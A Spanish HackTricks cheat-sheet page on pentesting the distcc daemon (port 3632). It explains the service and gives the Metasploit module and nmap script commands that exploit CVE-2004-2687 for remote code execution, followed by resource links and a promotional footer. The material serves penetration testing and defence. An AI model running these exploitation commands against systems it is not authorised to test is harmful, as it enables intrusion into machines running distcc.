2.6 KiB
Información Básica
Distcc está diseñado para acelerar la compilación aprovechando la potencia de procesamiento no utilizada en otros ordenadores. Una máquina con distcc instalado puede enviar código para ser compilado a través de la red a un ordenador que tenga el demonio distccd y un compilador compatible instalado.
Puerto predeterminado: 3632
PORT STATE SERVICE
3632/tcp open distccd
Explotación
Comprueba si es vulnerable a CVE-2004-2687 para ejecutar código arbitrario:
msf5 > use exploit/unix/misc/distcc_exec
nmap -p 3632 <ip> --script distcc-exec --script-args="distcc-exec.cmd='id'"
Shodan
No creo que Shodan detecte este servicio.
Recursos
- https://www.rapid7.com/db/modules/exploit/unix/misc/distcc_exec
- https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855
Post creado por Álex B (@r1p)
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
-
¿Trabajas en una empresa de ciberseguridad? ¿Quieres ver tu empresa anunciada en HackTricks? ¿O quieres tener acceso a la última versión de PEASS o descargar HackTricks en PDF? ¡Consulta los PLANES DE SUSCRIPCIÓN!
-
Descubre The PEASS Family, nuestra colección de exclusivos NFTs
-
Obtén el swag oficial de PEASS y HackTricks
-
Únete al 💬 grupo de Discord o al grupo de telegram o sígueme en Twitter 🐦@carlospolopm.
-
Comparte tus trucos de hacking enviando PR al repositorio de hacktricks y al repositorio de hacktricks-cloud.